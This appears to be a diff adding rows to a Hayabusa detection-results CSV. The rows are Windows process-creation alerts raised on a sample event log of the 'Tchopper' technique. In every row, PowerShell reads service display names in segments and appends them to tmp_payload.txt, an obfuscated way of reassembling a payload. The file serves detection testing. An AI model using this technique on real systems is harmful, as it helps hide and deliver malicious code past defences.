+2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
